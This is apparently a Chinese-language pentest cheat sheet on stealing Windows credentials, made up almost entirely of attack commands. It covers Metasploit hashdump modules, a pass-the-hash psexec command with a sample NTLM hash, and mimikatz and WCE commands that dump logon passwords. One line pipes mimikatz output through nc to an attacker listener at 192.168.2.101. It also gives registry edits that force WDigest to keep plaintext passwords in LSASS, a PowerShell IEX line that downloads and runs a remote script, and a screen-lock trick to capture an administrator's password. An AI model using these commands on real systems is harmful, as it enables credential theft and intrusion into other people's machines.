获取hash密码
msf
run post/windows/gather/smart_hashdump
run post/windows/gather/hashdump
有了密文数据可以做哪些事情?
PTH(hash传递) 需要知道用户以及密文密码LM:NT 445端口开放
exploit/windows/smb/psexec
python2 psexec.py 192.168.2.96/hk@192.168.2.96 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942
需要需要明文数据,需要去破解。Saminside字典破解
直接获取明文密码
MSF
load mimikatz #help mimikatz 查看帮助
wdigest #获取Wdigest密码
mimikatz_command -f samdump::hashes #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
GetPassword_x64.exe
mimikatz
privilege::debug sekurlsa::logonpasswords
wce -l -v 获取密文
攻击机监听:nc –lvvp 9999
肉鸡:mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.2.101 9999 ,可以将抓取的信息弹到攻击机
有补丁保护的密码抓取
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest ,下添加“UseLogonCredential”(DWORD)
攻击的思路是,将UseLogonCredential设置为1,强制将“明文”密码放置在 LSASS 进程中。
接下来的测试步骤有:修改注册表、锁屏(关机,但不推荐)、等待管理员登录
修改注册表:
cmd,reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest UseLogonCredential /t REG_DWORD /d 1 /f
powershell,Set-ItemProperty -Path HKLM:SYSTEMCurrentControlSetControlSecurityProvidersWDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter ,reg setval -k HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t REG_DWORD -d 1
锁屏:
cmd,rundll32 user32.dll,LockWorkStation
powershell,powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://x.x.x.x/Lock-WorkStation.ps1');"
Lock-WorkStation.ps1代码如下:
Function Lock-WorkStation
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation